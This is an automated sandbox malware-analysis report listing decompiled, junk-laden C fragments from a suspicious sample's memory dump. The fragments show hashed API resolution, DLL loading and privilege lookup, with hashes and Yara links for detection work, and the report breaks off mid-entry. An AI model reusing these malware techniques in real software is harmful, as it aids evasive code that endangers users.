                                                                                                                          • Instruction ID: bf50d6615e3a851f47153e1852c589cd20b96e00f5eebf3b99f7dff6005f4db2
                                                                                                                          • Opcode Fuzzy Hash: 05080370210f75a5a3fe5c957c173717e9568a082d75643143bc41a952943554
                                                                                                                          • Instruction Fuzzy Hash: 6E213AB2D4020857CB15DA65AD42BEF73BCAB54304F04007FE949A7182F63CBE498BA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004082E8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71threadwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E004082E8(void* __ecx, void* __esi, long _a8) {
				char _v63;
				char _v64;
				long __edi;
				void* __ebp;
				void* _t16;

				_pop(ss);
				asm("bound eax, [ebx]");
				if(__esi + 1 >= 0) {
					_t16 = E0041B330(__ecx);
					if(_t16 == 0 || _t16 == 0x33333333) {
						__eflags = 0;
						return 0;
					} else {
						return  *_a8 + _t16;
					}
				} else {
					__eflags = __ecx;
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x40;
					_push(__esi);
					__eax =  &_v63;
					_v64 = 0;
					__eax = E0041BA20( &_v63, 0, 0x3f);
					__ecx =  &_v64;
					__eax = E0041C5C0( &_v64, 3);
					_a8 = _a8 + 0x1c;
					__eax = E0040ACC0(__ebx, __eflags, _a8 + 0x1c,  &_v64); // executed
					__eax = E00414E10(_a8 + 0x1c, __eax, 0, 0, 0xc4e7b6d6);
					__esi = __eax;
					__eflags = __esi;
					if(__esi != 0) {
						_push(__edi);
						__edi = _a8;
						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
						__eflags = __eax;
						if(__eflags == 0) {
							__eax = E0040A450(__eflags, 1, 8);
							__eax = __al & 0x000000ff;
							__ecx = __ebp + __eax - 0x40;
							__eax =  *__esi(__edi, 0x8003, __ebp + __eax - 0x40, __eax);
						}
						_pop(__edi);
					}
					_pop(__esi);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}








                                                                                                                          0x004082e8
                                                                                                                          0x004082ea
                                                                                                                          0x004082ec
                                                                                                                          0x00408298
                                                                                                                          0x0040829c
                                                                                                                          0x004082af
                                                                                                                          0x004082b2
                                                                                                                          0x004082a6
                                                                                                                          0x004082ae
                                                                                                                          0x004082ae
                                                                                                                          0x004082ee
                                                                                                                          0x004082ee
                                                                                                                          0x004082f0
                                                                                                                          0x004082f1
                                                                                                                          0x004082f3
                                                                                                                          0x004082f6
                                                                                                                          0x004082f9
                                                                                                                          0x004082ff
                                                                                                                          0x00408303
                                                                                                                          0x00408308
                                                                                                                          0x0040830e
                                                                                                                          0x0040831a
                                                                                                                          0x0040831e
                                                                                                                          0x0040832e
                                                                                                                          0x00408333
                                                                                                                          0x00408338
                                                                                                                          0x0040833a
                                                                                                                          0x0040833c
                                                                                                                          0x0040833d
                                                                                                                          0x0040834a
                                                                                                                          0x0040834c
                                                                                                                          0x0040834e
                                                                                                                          0x00408355
                                                                                                                          0x0040835a
                                                                                                                          0x00408360
                                                                                                                          0x0040836b
                                                                                                                          0x0040836b
                                                                                                                          0x0040836d
                                                                                                                          0x0040836d
                                                                                                                          0x0040836e
                                                                                                                          0x0040836f
                                                                                                                          0x00408371
                                                                                                                          0x00408372
                                                                                                                          0x00408372

                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID: 3333
                                                                                                                          • API String ID: 1836367815-2924271548
                                                                                                                          • Opcode ID: 1c1fdf9ce575306d9f46668dd5bea2b6c3600d1bccfd3aee02544c7a1e1693d2
                                                                                                                          • Instruction ID: e3d37af9f4a3ae998a1a31596c42953fdc38290ff275a8c2d8b9ad50d5f4676e
                                                                                                                          • Opcode Fuzzy Hash: 1c1fdf9ce575306d9f46668dd5bea2b6c3600d1bccfd3aee02544c7a1e1693d2
                                                                                                                          • Instruction Fuzzy Hash: 0C112B316402187FEB20A6949D42FFE77589F41B50F08406EFE44BB2C1DA78A90147EA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A1F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID: oLA
                                                                                                                          • API String ID: 1279760036-3789366272
                                                                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                          • Instruction ID: 91a8afe93875cd4dd2c16ce4d21e80b139c6b658c845053945d21e38953d9919
                                                                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                          • Instruction Fuzzy Hash: F1E012B1200208ABDB14EF99DC41EA777ADAF88664F11855ABA085B242C630F910CBB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A1B6, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID: oLA
                                                                                                                          • API String ID: 1279760036-3789366272
                                                                                                                          • Opcode ID: 3d6703e194277b1ae2e8de4049c75e70dfff0c7056d4e725db8d9ccf5dfbc693
                                                                                                                          • Instruction ID: af225ebbf115edaa80c7d7cc310b5c55c013cba1dca817a18a305c20c7dcea64
                                                                                                                          • Opcode Fuzzy Hash: 3d6703e194277b1ae2e8de4049c75e70dfff0c7056d4e725db8d9ccf5dfbc693
                                                                                                                          • Instruction Fuzzy Hash: 4DD0C9B4204108AB8700EF59E8808AB736AAF88218711854AFC1943301C535E8618AB6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E004082F0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041BA20( &_v67, 0, 0x3f);
				E0041C5C0( &_v68, 3);
				_t12 = E0040ACC0(__ebx, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A450(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                                          0x004082f0
                                                                                                                          0x004082ff
                                                                                                                          0x00408303
                                                                                                                          0x0040830e
                                                                                                                          0x0040831e
                                                                                                                          0x0040832e
                                                                                                                          0x00408333
                                                                                                                          0x0040833a
                                                                                                                          0x0040833d
                                                                                                                          0x0040834a
                                                                                                                          0x0040834c
                                                                                                                          0x0040834e
                                                                                                                          0x0040836b
                                                                                                                          0x0040836b
                                                                                                                          0x00000000
                                                                                                                          0x0040836d
                                                                                                                          0x00408372

                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1836367815-0
                                                                                                                          • Opcode ID: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                                                                                                          • Instruction ID: dfcb319d37f54b0a0ecf43278dd58f432490a67f975cf55f4cf339e9819450c2
                                                                                                                          • Opcode Fuzzy Hash: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                                                                                                          • Instruction Fuzzy Hash: 1A01A731A803287BE720A6A59C43FFF776C6B40F54F05411EFF04BA1C1E6A9691546FA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040ACB3, Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E0040ACB3(void* __eax, void* __ebx, void* __esi, char _a1, void* _a8, intOrPtr _a12) {
				char* _v4;
				struct _EXCEPTION_RECORD _v8;
				struct _OBJDIR_INFORMATION _v12;
				char _v532;
				signed int _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t23;
				struct _OBJDIR_INFORMATION _t25;
				void* _t26;
				signed int* _t27;
				char* _t35;
				char* _t38;
				void* _t42;
				char* _t44;

				_t26 = __ebx;
				_t17 = __eax - 0x5b;
				asm("in eax, 0x1f");
				ds = __esi;
				_t35 =  &_a1;
				_t44 = _t35;
				if(_t44 != 0) {
					L7:
					asm("cmpsb");
					 *_t27 =  *_t27 & _t17;
					_t7 = _t26 + 0x558b08c4;
					 *_t7 =  *((intOrPtr*)(_t26 + 0x558b08c4)) + _t17;
					__eflags =  *_t7;
					goto L8;
				} else {
					if(_t44 != 0) {
						L8:
						asm("les ecx, [eax]");
						goto L9;
					} else {
						asm("sbb [ebp-0x75], dl");
						_push(_t35);
						_t35 = _t38;
						_v4 =  &_v532;
						_t23 = E0041C810( &_v8, 0x104, _a12);
						_t42 = _t38 - 0x214 + 0xc;
						if(_t23 != 0) {
							_t25 = E0041CC30(__eflags, _v8);
							_t38 = _t42 + 4;
							__eflags = _t25;
							if(_t25 != 0) {
								_t27 =  &_v12;
								_t17 = E0041CEB0(_t27, 0);
								goto L7;
							}
							L9:
							_t18 = E0041B060(_v4);
							_v12 = _t18;
							__eflags = _t18;
							if(_t18 == 0) {
								LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
								_t18 = _v12;
							}
							return _t18;
						} else {
							return _t23;
						}
					}
				}
			}

















                                                                                                                          0x0040acb3
                                                                                                                          0x0040acb3
                                                                                                                          0x0040acb6
                                                                                                                          0x0040acb8
                                                                                                                          0x0040acba
                                                                                                                          0x0040acba
                                                                                                                          0x0040acbb
                                                                                                                          0x0040ad06
                                                                                                                          0x0040ad06
                                                                                                                          0x0040ad07
                                                                                                                          0x0040ad09
                                                                                                                          0x0040ad09
                                                                                                                          0x0040ad09
                                                                                                                          0x00000000
                                                                                                                          0x0040acbd
                                                                                                                          0x0040acbd
                                                                                                                          0x0040ad0b
                                                                                                                          0x0040ad0b
                                                                                                                          0x00000000
                                                                                                                          0x0040acbf
                                                                                                                          0x0040acbf
                                                                                                                          0x0040acc0
                                                                                                                          0x0040acc1
                                                                                                                          0x0040acdc
                                                                                                                          0x0040acdf
                                                                                                                          0x0040ace4
                                                                                                                          0x0040ace9
                                                                                                                          0x0040acf3
                                                                                                                          0x0040acf8
                                                                                                                          0x0040acfb
                                                                                                                          0x0040acfd
                                                                                                                          0x0040acff
                                                                                                                          0x0040ad05
                                                                                                                          0x00000000
                                                                                                                          0x0040ad05
                                                                                                                          0x0040ad0d
                                                                                                                          0x0040ad11
                                                                                                                          0x0040ad19
                                                                                                                          0x0040ad1c
                                                                                                                          0x0040ad1e
                                                                                                                          0x0040ad32
                                                                                                                          0x0040ad34
                                                                                                                          0x0040ad34
                                                                                                                          0x0040ad3a
                                                                                                                          0x0040aceb
                                                                                                                          0x0040acee
                                                                                                                          0x0040acee
                                                                                                                          0x0040ace9
                                                                                                                          0x0040acbd

                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 6a1883fa3df364d00ab308787177eaaa5395b6c117eefb219030bb0774dce5ec
                                                                                                                          • Instruction ID: 8eb2301004882bfed2658affd43f0a5eeaebbd990e514aec3a06f004a3f8bdd8
                                                                                                                          • Opcode Fuzzy Hash: 6a1883fa3df364d00ab308787177eaaa5395b6c117eefb219030bb0774dce5ec
                                                                                                                          • Instruction Fuzzy Hash: 2201D875D4020DABCF10DBA4D881FDD77B5EF44318F1082EAE9099B251F235D65ACB42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A262, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 19%
                                                                                                                          			E0041A262(void* __eax, void* __ecx, void* _a1, int _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v0;
				void* _v1;
				signed char _t15;
				signed char _t24;
				void* _t32;
				signed char* _t33;

				_t24 = __ecx - 1;
				asm("fisub word [ebx+esi*8]");
				_t15 = _t24;
				asm("les edi, [edx+0x1b]");
				asm("fcomp3 st6");
				if(_t24 >= 0) {
					_push(_t32);
					_t20 = _v0;
					_push(_t33);
					_t33 = _v0 + 0xc7c;
					E0041AB20(_t32, _t20, _t33,  *((intOrPtr*)(_t20 + 0xa14)), 0, 0x36);
					_t28 = _a4;
					_t15 =  *_t33;
					ExitProcess(_a4);
				}
				 *((intOrPtr*)(__eax - 0x75)) =  *((intOrPtr*)(__eax - 0x75)) - _t28;
				return  *( *_t33)(_a12, _a16, _a20, _a24, _a28, _a32, __eax, _t15 & 0x00000052);
			}









                                                                                                                          0x0041a262
                                                                                                                          0x0041a263
                                                                                                                          0x0041a266
                                                                                                                          0x0041a267
                                                                                                                          0x0041a26a
                                                                                                                          0x0041a26c
                                                                                                                          0x0041a26e
                                                                                                                          0x0041a273
                                                                                                                          0x0041a27c
                                                                                                                          0x0041a282
                                                                                                                          0x0041a28a
                                                                                                                          0x0041a28f
                                                                                                                          0x0041a292
                                                                                                                          0x0041a298
                                                                                                                          0x0041a298
                                                                                                                          0x0041a2d2
                                                                                                                          0x0041a2f8

                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: 4abe985106a79419cf1ec235fbccd1ea9952f58f99598e9530d47a1ee41f35d9
                                                                                                                          • Instruction ID: a7fe49d223b48750c27ab17b1d12878145246f7a98e041d23e66a3874a00bc26
                                                                                                                          • Opcode Fuzzy Hash: 4abe985106a79419cf1ec235fbccd1ea9952f58f99598e9530d47a1ee41f35d9
                                                                                                                          • Instruction Fuzzy Hash: A2018BB6200108ABC714DF98DC84EEB73ADEF88300F10815DBA5C9B642C634EA12CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A381, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 30%
                                                                                                                          			E0041A381(void* __edx, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				void* _v117;
				signed int _t8;
				void* _t11;
				int _t17;
				intOrPtr* _t18;
				void* _t25;

				_push(cs);
				_t11 = (_t8 | 0x00000060) - 0xca695158;
				asm("wait");
				if(_t11 > 0) {
					return  *_t18(_t11, __edx, cs);
				} else {
					_t14 = _v0;
					E0041AB20(_t25, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t14 + 0xa18)), 0, 0x46);
					_t17 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
					return _t17;
				}
			}










                                                                                                                          0x0041a382
                                                                                                                          0x0041a385
                                                                                                                          0x0041a38a
                                                                                                                          0x0041a38b
                                                                                                                          0x0041a400
                                                                                                                          0x0041a38d
                                                                                                                          0x0041a393
                                                                                                                          0x0041a3aa
                                                                                                                          0x0041a3c0
                                                                                                                          0x0041a3c4
                                                                                                                          0x0041a3c4

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 9469479746c1abb94035fb50c7da2de63c6e60b7007db871f5e55df9f7e952b6
                                                                                                                          • Instruction ID: 62cc6e4f7d922e68cfd5948dcaec3ae9cc405c55fcfe40af2c058d69eb1ce2bb
                                                                                                                          • Opcode Fuzzy Hash: 9469479746c1abb94035fb50c7da2de63c6e60b7007db871f5e55df9f7e952b6
                                                                                                                          • Instruction Fuzzy Hash: 2AF0BEB12001483BDA10EF689C86EEB3B6ADF84764F018196FD1D97202CA35E95187B5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A230, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A230(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AB20(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                          0x0041a23f
                                                                                                                          0x0041a247
                                                                                                                          0x0041a25d
                                                                                                                          0x0041a261

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                          • Instruction ID: 9eb97300d5e10087c94d33d02e30a743291ab6cce32cf35ae9b88dc6f9268b02
                                                                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                          • Instruction Fuzzy Hash: 0EE01AB12002046BD714DF59DC45EA777ADAF88754F014559BA0857241C630F910CAB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A390, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A390(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AB20(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                          0x0041a3aa
                                                                                                                          0x0041a3c0
                                                                                                                          0x0041a3c4

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                          • Instruction ID: bf4187e38ed515452a76a24d05e88418ebf87a1f9c5c0c5d517d21230e680a96
                                                                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                          • Instruction Fuzzy Hash: DEE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934F8108BF5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A270, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A270(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AB20(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                          0x0041a273
                                                                                                                          0x0041a28a
                                                                                                                          0x0041a298

                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                          • Instruction ID: 654422823446a6dc42c61fec1171b68ac592b5503343b56bfda4b4a103558910
                                                                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                          • Instruction Fuzzy Hash: 1FD017726042187BD620EB99DC85FD777ADDF487A4F0180AABA1C6B242C531BA10CBE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A0967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 533862cca9585a24181fa9b0be052c9c4ad18b8153eb62aa641dee1532fbfa85
                                                                                                                          • Instruction ID: 7f541cce7341b726ca3189041fa932a6336af74422518780cffbe53c04ca977f
                                                                                                                          • Opcode Fuzzy Hash: 533862cca9585a24181fa9b0be052c9c4ad18b8153eb62aa641dee1532fbfa85
                                                                                                                          • Instruction Fuzzy Hash: 06B092B29024D9CAEB11E7B05A08B2B7E00BBE0741F26C562E2020685B4779C4D1F6F6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 00A7B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          • The resource is owned shared by %d threads, xrefs: 00A7B37E
                                                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00A7B39B
                                                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A7B38F
                                                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00A7B2DC
                                                                                                                          • Go determine why that thread has not released the critical section., xrefs: 00A7B3C5
                                                                                                                          • <unknown>, xrefs: 00A7B27E, 00A7B2D1, 00A7B350, 00A7B399, 00A7B417, 00A7B48E
                                                                                                                          • read from, xrefs: 00A7B4AD, 00A7B4B2
                                                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00A7B476
                                                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A7B3D6
                                                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00A7B484
                                                                                                                          • The instruction at %p tried to %s , xrefs: 00A7B4B6
                                                                                                                          • This failed because of error %Ix., xrefs: 00A7B446
                                                                                                                          • The critical section is owned by thread %p., xrefs: 00A7B3B9
                                                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00A7B47D
                                                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 00A7B352
                                                                                                                          • *** then kb to get the faulting stack, xrefs: 00A7B51C
                                                                                                                          • The resource is owned exclusively by thread %p, xrefs: 00A7B374
                                                                                                                          • a NULL pointer, xrefs: 00A7B4E0
                                                                                                                          • The instruction at %p referenced memory at %p., xrefs: 00A7B432
                                                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00A7B314
                                                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00A7B2F3
                                                                                                                          • write to, xrefs: 00A7B4A6
                                                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00A7B323
                                                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00A7B53F
                                                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00A7B305
                                                                                                                          • an invalid address, %p, xrefs: 00A7B4CF
                                                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 00A7B48F
                                                                                                                          • *** enter .cxr %p for the context, xrefs: 00A7B50D
                                                                                                                          • *** Inpage error in %ws:%s, xrefs: 00A7B418
                                                                                                                          • *** enter .exr %p for the exception record, xrefs: 00A7B4F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                          • API String ID: 0-108210295
                                                                                                                          • Opcode ID: 1cb360908f3242e83aaad84f4b39ce2ca7d2abcef72e2a8388511354226686da
                                                                                                                          • Instruction ID: 238d3a9281b5fd7369d3daeac5aa51d18f3cf421a581288b7b4847468e33e8fd
                                                                                                                          • Opcode Fuzzy Hash: 1cb360908f3242e83aaad84f4b39ce2ca7d2abcef72e2a8388511354226686da
                                                                                                                          • Instruction Fuzzy Hash: 7C8123B5A11210FFCB256B158D56EBB3F35AF8AB66F40C054F4092B153E3719841DBB2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A81C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
